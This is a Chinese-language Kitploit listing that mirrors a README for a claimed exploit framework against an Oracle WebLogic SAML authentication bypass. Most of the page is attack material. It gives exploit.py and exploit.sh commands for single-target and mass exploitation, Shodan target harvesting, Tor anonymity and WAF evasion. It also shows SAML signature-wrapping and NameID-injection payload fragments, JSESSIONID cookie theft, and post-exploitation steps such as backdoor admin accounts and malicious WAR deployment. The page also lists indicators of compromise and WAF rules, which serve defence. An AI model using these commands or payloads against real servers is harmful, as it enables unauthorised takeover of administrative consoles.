Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-60206-PoC-Exploit — 👾 CVE-2026-60206 - Oracle WebLogic SAML Auth Bypass Exploit Framework ⚡Bash & Python versions. Features: --detect safe check, --exploit combo/unsigned/xsw/nameid/all, --shodan integration, --tor support, mass scanning, JSON/CSV/JSONL output, cookie validation. 🛡️ CVSS 9.9 Critical - Use Ethically, Stay Legal. 🔒 | Kitploit
工具/GitHubGitHub/tc4dy/cve-2026-60206-poc-exploit
Authentication & AuthorizationExploit FrameworksPayload GenerationVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPost-ExploitationWAF Bypass

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →

关于

👾 CVE-2026-60206 - Oracle WebLogic SAML Auth Bypass Exploit Framework ⚡Bash & Python versions. Features: --detect safe check, --exploit combo/unsigned/xsw/nameid/all, --shodan integration, --tor support, mass scanning, JSON/CSV/JSONL output, cookie validation. 🛡️ CVSS 9.9 Critical - Use Ethically, Stay Legal. 🔒

分享
Penetration Testing
Red Teaming
GitHubtc4dy/cve-2026-60206-poc-exploit

CVE-2026-60206-PoC-Exploit

查看仓库
4226天前尚未审核

CVE-2026-60206

CVE-2026-60206 - Oracle WebLogic SAML 认证绕过利用框架工具包

CVE-2026-60206 CVSS 9.9 CISA KEV Python 3.6+

Pre-Auth Bypass SAML Injection Admin Access Cross-Platform

Oracle WebLogic Server — SAML 认证绕过 → 管理员接管

利用框架及批量扫描器
仅供授权的安全测试使用。


⚖️ 法律免责声明与负责任使用

本工具仅供教育和授权的渗透测试之用。

作者和贡献者不对因使用本软件而导致的任何误用或损害负责。用户独自负责确保在测试前已获得目标所有者的明确书面许可。未经授权访问计算机系统违反《计算机欺诈和滥用法》(CFAA) 及全球类似法律。

使用本软件即表示您同意:

  • 仅用于您拥有或已获明确许可进行测试的系统。
  • 遵守所有适用的地方、州和联邦法律。
  • 不将其用于任何恶意、破坏性或非法活动。

⚠️ 警告: 该漏洞正在被积极利用。未经授权使用可能导致严重的法律后果。


[+!] 漏洞概述

CVE-2026-60206 是 Oracle WebLogic Server 中 SAML(安全断言标记语言)实现的一个关键未经认证的认证绕过漏洞。它允许远程攻击者绕过 SAML 认证,无需有效凭据即可获得 WebLogic 控制台的管理员访问权限。

工作原理:

  1. SAML 注入: 该漏洞源于对 SAML 断言的不当验证。攻击者可以构造恶意 SAML 响应,绕过认证检查。

  2. 签名绕过: 该漏洞允许通过 XML 签名包装 (XSW) 攻击绕过 XML 签名验证,攻击者将恶意断言与合法签名包装在一起。

  3. NameID 操纵: 攻击者可以注入注释或操纵 NameID 字段以冒充特权用户。

  4. 管理员访问: 成功利用使攻击者获得 WebLogic Server 控制台的管理员访问权限,拥有完全控制权。

关键事实:


🛠️ 利用框架

完整教育性多利用链结合多个 SAML 攻击向量实现认证绕过,具备批量扫描、Cookie 窃取和管理员访问等高级功能。

✨ 功能特性

攻击向量


🕵️ 安全验证器(--detect)

安全验证器执行非侵入性漏洞检测,不会执行有害载荷或修改系统。

✨ 功能特性


📦 安装与要求

先决条件

  • Python 3.6+ 或 Bash 3.2+
  • curl(适用于 Bash 版本)
  • pip(适用于 requests 库,Python 版本)

安装依赖

root@kitploit:~
# Python 版本
pip install requests urllib3

# 可选:Shodan 支持
pip install shodan

# Bash 版本:仅需 curl(无额外依赖)

[!NOTE] Bash 版本仅依赖 curl,无外部依赖。Python 版本需要 requests 和 urllib3(可选:shodan 用于 Shodan 集成)。


🚀 使用示例

[1] Python 利用框架(exploit.py)

root@kitploit:~
# 单个目标利用(combo 模式)
python exploit.py -u https://192.168.1.100:7002 --exploit --user admin

# 使用所有攻击向量进行利用
python exploit.py -u https://192.168.1.100:7002 --mode all --exploit -v

# 从文件批量扫描(50 线程)
python exploit.py -l targets.txt --exploit -t 50 -o results.json

# 仅安全检测(非侵入式)
python exploit.py -l targets.txt --detect -o scan_results.csv

# Shodan 集成
export SHODAN_API_KEY="your_api_key"
python exploit.py --shodan --shodan-query "WebLogic Server port:7002" --exploit

# Tor 匿名扫描
python exploit.py -l targets.txt --exploit --tor -t 20

# 代理支持
python exploit.py -u https://192.168.1.100:7002 --exploit --proxy http://127.0.0.1:8080

# 流式 JSONL 输出(大扫描内存高效)
python exploit.py -l targets.txt --exploit -o results.jsonl

# 静默模式(最少输出)
python exploit.py -l targets.txt --exploit -q -o results.json

# 自定义超时和重试
python exploit.py -u https://192.168.1.100:7002 --exploit --timeout 20 --retry 5 --delay 2.0

# SSL 验证绕过
python exploit.py -u https://192.168.1.100:7002 --exploit --no-verify

# 详细调试
python exploit.py -u https://192.168.1.100:7002 --exploit -v

[2] Bash 利用框架(exploit.sh)

root@kitploit:~
# 单个目标利用
./exploit.sh -u https://192.168.1.100:7002 --exploit --user admin

# 批量扫描
./exploit.sh -l targets.txt --mode all --exploit -o results.json

# Tor 匿名扫描
./exploit.sh -l targets.txt --exploit --tor -t 20

# Shodan 集成
export SHODAN_API_KEY="your_api_key"
./exploit.sh --shodan --exploit -o shodan_results.json

# 流式 JSONL 输出
./exploit.sh -l targets.txt --exploit -o results.jsonl

# 代理支持
./exploit.sh -u https://192.168.1.100:7002 --exploit --proxy http://127.0.0.1:8080

# SSL 验证绕过
./exploit.sh -u https://192.168.1.100:7002 --exploit --no-verify

# 静默模式
./exploit.sh -l targets.txt --exploit -q -o results.json

# 详细调试
./exploit.sh -u https://192.168.1.100:7002 --exploit -v

[3] 基础验证器(verifier_poc.sh)

root@kitploit:~
# 单个目标验证
./verifier_poc.sh -u https://192.168.1.100:7002 --user admin

# 批量验证并生成报告
./verifier_poc.sh -l targets.txt --user admin -o report.txt

# SSL 验证绕过
./verifier_poc.sh -u https://192.168.1.100:7002 --no-verify

# 代理支持
./verifier_poc.sh -u https://192.168.1.100:7002 --proxy http://127.0.0.1:8080

🎯 受影响版本

Oracle WebLogic 版本

⚠️ 重要: 此漏洞影响自托管 WebLogic Server 部署。请立即应用 Oracle CPU 2026 年 7 月。


🧠 技术深度剖析

1. SAML 认证绕过

该漏洞允许攻击者通过构造由 WebLogic 的 SAML 实现不当验证的恶意 SAML 响应来绕过 SAML 认证。

脆弱端点:

root@kitploit:~
POST /saml2/sp/acs HTTP/1.1
Host: target:7002
Content-Type: application/x-www-form-urlencoded

SAMLResponse=<base64_encoded_malicious_assertion>&RelayState=/

2. 攻击向量

无签名断言

saml2:Assertion saml2:Subject <saml2:NameID Format="...">admin</saml2:NameID> </saml2:Subject>

</saml2:Assertion>

XML 签名包装(XSW)

ds:Signature <ds:Reference URI="#legit"> </ds:Reference> </ds:Signature>

<saml2:Assertion ID="evil"> saml2:Subjectadmin</saml2:Subject> </saml2:Assertion>

NameID 注释注入

<saml2:NameID Format="...">

lowpriv

</saml2:NameID>

3. 后利用

Cookie 窃取

成功利用后会获得 JSESSIONID Cookie,从而获得 WebLogic 控制台的管理员访问权限。

会话劫持

窃取的 Cookie 可用于访问:

  • WebLogic 管理控制台
  • 部署/取消部署应用程序
  • 访问 JNDI 资源
  • 通过 JMX 执行任意命令

持久化

  • 部署恶意应用程序(WAR 文件)
  • 创建后门管理员用户
  • 安装远程访问工具

横向移动

  • 通过窃取的凭证访问网络中的其他服务器
  • 利用 WebLogic 与其他系统之间的信任关系
  • 跳转到内部网络

🔍 入侵指标(IoCs)

日志分析

检查 WebLogic 日志中是否存在:

  • access.log – 针对 /saml2/sp/acs、/saml2/acs 并带有异常 SAML 参数的请求
  • domain.log – 使用无效 SAML 断言进行的认证绕过尝试
  • diagnostic.log – SAML 解析错误或签名验证失败

可疑请求

  • SAMLResponse 参数包含:
    • 多个 <saml2:Assertion> 标签
    • <saml2:NameID> 字段中的注释
    • 无签名的断言
    • Base64 编码的恶意 XML
    • 参数中的 javascript: 或 eval()

文件

  • WebLogic 临时目录中的意外会话文件
  • 修改的配置文件(config.xml、jps-config.xml)
  • autodeploy 目录中的新 WAR 文件
  • 修改的 weblogic.security 文件

网络

  • 对 WebLogic 控制台的未授权管理连接
  • 针对 SAML 端点的异常端口扫描
  • 从 WebLogic 服务器到未知 IP 的出站连接
  • 非常用端口上的反弹 shell 连接

进程

  • 意外的 Java 进程
  • 从 WebLogic 衍生的 shell 进程
  • 从 WebLogic 用户到外部主机的网络连接

🛡️ 缓解与修复

立即行动

  1. 立即应用 Oracle CPU 2026 年 7 月
  2. 如果未积极使用,请禁用 SAML
  3. 监控 SAML 端点是否存在可疑活动
  4. 检查访问日志中是否存在利用尝试
  5. 轮换受影响系统上的所有凭据

长期行动

  1. 实施 WAF 规则以阻止恶意 SAML 请求
  2. 启用严格模式的 SAML 签名验证
  3. 定期对 WebLogic 配置进行安全审计
  4. 网络分段以限制 WebLogic 暴露面
  5. 实施 SIEM 监控用于 WebLogic 事件

WAF 规则

root@kitploit:~
# 阻止包含多个断言的 SAML 请求
SecRule REQUEST_URI "/saml2/sp/acs|/saml2/acs" \
    "id:10001,phase:1,deny,status:403,\
    msg:'CVE-2026-60206 - Multiple SAML Assertions',\
    chain"
    SecRule ARGS:SAMLResponse ".*<saml2:Assertion>.*<saml2:Assertion>.*"

# 阻止 NameID 中包含注释的 SAML 请求
SecRule REQUEST_URI "/saml2/sp/acs|/saml2/acs" \
    "id:10002,phase:1,deny,status:403,\
    msg:'CVE-2026-60206 - NameID Comments',\
    chain"
    SecRule ARGS:SAMLResponse ".*<saml2:NameID.*<!--.*-->.*"

# 阻止无签名的 SAML 断言
SecRule REQUEST_URI "/saml2/sp/acs|/saml2/acs" \
    "id:10003,phase:1,deny,status:403,\
    msg:'CVE-2026-60206 - Unsigned Assertion',\
    chain"
    SecRule ARGS:SAMLResponse ".*<saml2:Assertion>.*(?!<ds:Signature>).*"

📚 参考

  • NVD - CVE-2026-60206
  • Oracle Critical Patch Update Advisory - July 2026
  • CISA KEV 目录
  • SecurityFocus - CVE-2026-60206
  • The Hacker News - WebLogic Zero-Day Exploited

🔗 其他漏洞利用

  • CVE-2026-15409/15410 - SonicWall SMA1000 多利用框架
  • CVE-2026-6875 - ServiceNow 预认证 RCE 利用框架
  • CVE-2026-41091 - SolarFlare (RedSun) Microsoft Defender LPE
  • CVE-2026-57821 - Apache Fineract SQL 注入工具包
  • CVE-2026-41940 - cPanel/WHM 认证绕过
下载工具
属性值
📅 发现时间2026 年 7 月(Oracle CPU)
⚠️ CVSS 评分9.9(严重)
📋 CISA KEV2026 年 7 月 21 日添加
🎯 受影响产品Oracle WebLogic Server(Fusion Middleware)
🔄 修复版本Oracle CPU 2026 年 7 月
🔓 认证要求不需要(预认证)
🌍 主动利用已确认野外利用(2026 年 7 月)
功能描述
🚀 多向量利用7 个攻击向量:unsigned、xsw_v1-4、nameid、combo
💻 批量扫描使用线程池(Python)/ FIFO(Bash)进行并发扫描
🔐 Cookie 窃取窃取 JSESSIONID 用于会话劫持
👑 管理控制台访问完全管理员权限访问 WebLogic 控制台
📁 版本检测检测 WebLogic 版本及漏洞状态
🌐 批量扫描使用线程对多个目标进行批量利用
🎯 安全检测可选 --detect 标志,用于非侵入性漏洞验证
🧩 Shodan 集成直接从 Shodan 搜索加载目标
🔍 Tor 支持通过 Tor 代理匿名扫描
📊 多种输出格式JSON、CSV、JSONL 流式输出
🪟 跨平台支持 Linux、macOS、BSD、Alpine、WSL
🔒 线程安全使用锁机制确保并发操作安全
📋 自动保存会话保存成功的 Cookie 供后续使用
⚙️ WAF 绕过User-Agent 轮换和随机延迟
向量描述
unsigned无签名的未认证 SAML 断言
xsw_v1XML 签名包装 - 多重断言
xsw_v2XSW - 信封式签名绕过
xsw_v3XSW - 命名空间操纵
xsw_v4XSW - 多重断言注入
nameidNameID 注释注入
combo组合攻击(unsigned + XSW + NameID)
功能描述
🔍 WebLogic 检测通过 LoginForm.jsp 识别 WebLogic 实例
📊 版本检测检测具体 WebLogic 版本及补丁级别
🧪 SAML 端点发现测试 SAML ACS 端点
🔒 非侵入式仅识别易受攻击的版本
📋 JSON/CSV 输出导出结果用于报告
🔄 批量扫描支持线程的多目标扫描
状态
12.2.1.4.0🔴 易受攻击
14.1.1.0.0🔴 易受攻击
14.1.2.0.0🔴 易受攻击
15.1.1.0.0🔴 易受攻击
其他版本请查阅 Oracle CPU 2026 年 7 月